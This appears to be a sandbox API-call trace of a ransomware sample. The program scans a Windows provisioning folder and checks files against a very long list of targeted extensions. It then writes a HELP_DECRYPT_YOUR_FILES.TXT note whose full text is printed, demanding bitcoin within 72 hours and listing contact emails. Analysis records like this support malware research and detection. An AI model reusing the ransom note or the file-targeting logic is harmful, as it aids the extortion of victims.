	[0174.274] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\"
	[0174.274] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml"
	[0174.274] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0174.274] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.274] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0174.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.275] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0174.275] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml"
	[0174.275] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml") returned 109
	[0174.275] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.275] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0174.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.276] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0174.276] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13252fc, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13252fc, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13252fc, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0174.276] lstrcmpW (lpString1="Power_1.provxml", lpString2="..") returned 1
	[0174.276] lstrcmpW (lpString1="Power_1.provxml", lpString2=".") returned 1
	[0174.276] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\"
	[0174.276] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\", lpString2="Power_1.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml"
	[0174.276] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml") returned 109
	[0174.277] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.277] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml") returned 0x6d
	[0174.277] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.277] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0174.277] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml"
	[0174.277] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_1.provxml") returned 109
	[0174.277] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.278] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.278] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0174.278] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.278] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0174.278] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13252fc, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13252fc, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13252fc, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0
	[0174.279] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 1
	[0174.279] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 0
	[0174.279] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime"
	[0174.279] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*"
	[0174.279] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.310] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.310] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0174.310] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.315] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0174.315] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0174.318] CloseHandle (hObject=0x39c) returned 1
	[0174.318] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
